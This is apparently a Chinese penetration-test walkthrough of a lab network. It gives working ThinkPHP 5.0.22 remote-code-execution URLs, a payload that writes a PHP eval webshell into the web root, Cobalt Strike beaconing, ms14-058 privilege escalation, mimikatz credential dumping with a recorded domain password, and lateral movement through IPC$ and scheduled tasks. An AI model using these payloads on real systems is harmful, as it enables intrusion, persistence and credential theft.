訪問10.88.0.233，發現是thinkphp

構造url發現報錯,，thinkphp的版本為5.0.22

扔到goby裡發現開放了3306和80，以及存在RCE

構造POC http://10.88.0.233/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami 發現可以執行whoami

檢視路徑 http://10.88.0.233/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=powershell%20pwd

寫馬 http://10.88.0.233/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^<?php@eval($_POST[cmd]);?^> > C:\phpStudy\PHPTutorial\WWW\public\b.php

檢視許可權為administrator

檢視arp表

發現存在86段，存在192.168.86.200的主機 ipconfig/all 檢視

發現存在sun.com，ping試試

返回的是86段的那臺主機，於是可以判斷這臺主機是DC CS生成exe

上傳到網站Public目錄下，在cmd執行exe

CS成功上線

利用ms14-058進行提權

獲取到system許可權 執行mimikatz可以拿到DC的使用者名稱密碼dc123.com

執行portscan 192.168.86.0/24 445 arp 50

可以看到DC 192.168.86.200 由於DC沒有辦法出網，於是我選擇win7的web主機作為跳板 在win7上設定監聽中轉

生成後門上傳到web主機C盤目錄下

建立IPC$連線

copy檔案

檢視目標系統的時間

使用at建立計劃任務

DC成功上線

DC檢視程序，殺死beacon程序 CS斷連，移到web機beacon操作 通過IPC$刪除 beacon檔案